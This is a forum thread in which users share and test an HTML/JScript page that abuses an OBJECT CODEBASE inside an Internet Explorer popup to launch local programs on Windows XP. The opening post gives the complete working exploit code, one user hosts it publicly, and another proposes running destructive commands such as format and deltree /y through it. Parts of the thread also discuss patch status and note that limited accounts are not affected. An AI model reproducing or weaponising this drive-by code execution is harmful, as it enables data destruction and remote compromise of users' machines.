Serious Problem With Windows XP Keep this going

cremator

Senior member
Sep 21, 2001
643
0
0
Im just going to paste the source and explain what it does,nothing less.



<HTML>
<HEAD>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'
);

function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>



Basically this is an HTML file when opened in Windows XP will log you off. Some might say "so" but when you open it, it doesnt ask to save work in progress ect. The other concern is that other may be able to use command lines like command.com ect to do something worse. I've only tested with logoff.exe and sol.exe, anyone else feel free to test with other programs. Lamers please don't put this on a site just to be an idiot, no one wants to loose work thats been in progress for hours/days/weeks/months.
-Cremator
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Worked for me (Cremator's friend).
I just tried it out after seeing his post.
Slapped it in a TXT file, renamed to *.htm double clicked it and it logged me off.
And my programs weren't still open when I logged back in :|
I'm too used to XPs "multiple users logged in at the same time" (Fast User Switching) features...
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
Nice, is this really a new remote exploit? Or is it fixed by a recent IE patch?

Looks mind-numbingly simple, although to be honest, it wouldn't surprise us that much.
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Perhaps IE only runs it if it's on your local machine. I dunno really...
 

mattbta

Senior member
Dec 15, 2001
223
0
76
brotherson.com
When I get home I'll slap it on my server and then try to access the page from my XP box. I thought an exploit like this was fixed with the last IE patch.

We'll see what happens.
 

Confused

Elite Member
Nov 13, 2000
14,166
0
0
Well, it works when it's hosted on another computer.

Don't believe me, click here! (Make sure you save all work first tho if running WinXP! Don't say i didn't warn you!)

ConfusedBW
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
So the only question is whether recent IE patches fix this obvious, major problem, or if it's currently a problem in the wild?
 

Abzstrak

Platinum Member
Mar 11, 2000
2,450
0
0
glad I'm not running windows....

anyways, we need to try this with some other apps that are standard to winxp... like format, deltree /y, etc...

has anyone tried this on nt or 2k?

 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems.
 

CZroe

Lifer
Jun 24, 2001
24,195
857
126
Still logs me out (I felt that I had to wait a bit longer though).
The only updates not installed on my side:
Euro Conversion Tool
GeForce3 driver Update (Gateway)

Not sure what that GF3 thing is about, I'm using a home-built P4 system with a retail VisionTek GF3. All I know is that when I installed that update I couldn't even raise my resolution to 1024x768! I hope the driver roll-back didn't affect the other updates :)
 

dionx

Diamond Member
Mar 11, 2001
3,500
1
81
i just installed 2 security updates and 2 critical updates and it still logs me off.

 

speed01

Golden Member
Jan 23, 2001
1,167
0
0
Didn't log me out. I ran Windows Update last week and only did the critical and security.
 

Dreadogg

Golden Member
Mar 1, 2001
1,780
0
76
logged me out and Im all updated! Ok you guys that did not get loged out are you using XP pro or XP home?
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136
I did a little more testing, and I'll take back my comments from a few days ago that system updates cured IE.

It seems like the Administrator user is vulnerable, but limited users are not. I test WXP Pro under VMware, so I can repeat different iterations pretty easily. Note that I believe most installations of WXP will add created user accounts to the Administrator group, so this is a serious problem.

Security settings for the Internet and Intranet domains have no effect; setting them both to High still exposed the problem. I was too lazy to test from a web server though, and just loaded the file locally.

Finally, it seems you can run any executable, but I wasn't able to to get it to run arbitrary shell commands using cmd /C

I'm sure more seasoned crackers than myself could do much heavier damage though. If I weren't such a cynic, I'd say this is a new, dangerous remote exploit. But I'm sure Mickeysoft is aware of the problem, and will sit on it until a white hat hacker goes to the media. Any volunteers?
 

Dreadogg

Golden Member
Mar 1, 2001
1,780
0
76
very interesting, seems we really should'nt be surfin the net as administrator anyway! I seem to play around with linux every once and a while and I always remember reading make sure you dont surf the net as root I guess this all ties in together for now im just going to set up a new account as user!



EDIT: I am not affected as user! Good call!
 

TBC

Member
Nov 27, 2001
144
0
0


<< I installed a slew of OS updates earlier, and that HTML no longer logs out the user.

I view this as mixed news though. On the one hand, we know Mickeysoft does fix security problems that are exposed in the wild.

On the other hand, I'd say at least half of all home users are not savvy enough to understand they need to go to Windows Update regularly to admin their box.

My final conclusion is that historically, Winblows and IE are security/privacy problems.
>>


Let me guess, you use Linsux.
 

manly

Lifer
Jan 25, 2000
13,589
4,239
136


<<
Let me guess, you use Linsux.
>>



Oh the irony of trolling in a thread about a major remote exploit in WXP.
 

neuralfx

Golden Member
Feb 19, 2001
1,636
0
0


<< I'm too used to XPs "multiple users logged in at the same time" (Fast User Switching) features >>



heh sorry, i'm not trolling.. but couldnt resist .. this "Fast User Switching" .. or i guess microsoft probably calls it FUS, could this possibly have been "borrowed" from UNIX .. eh naw ms wouldnt do that =)
-neural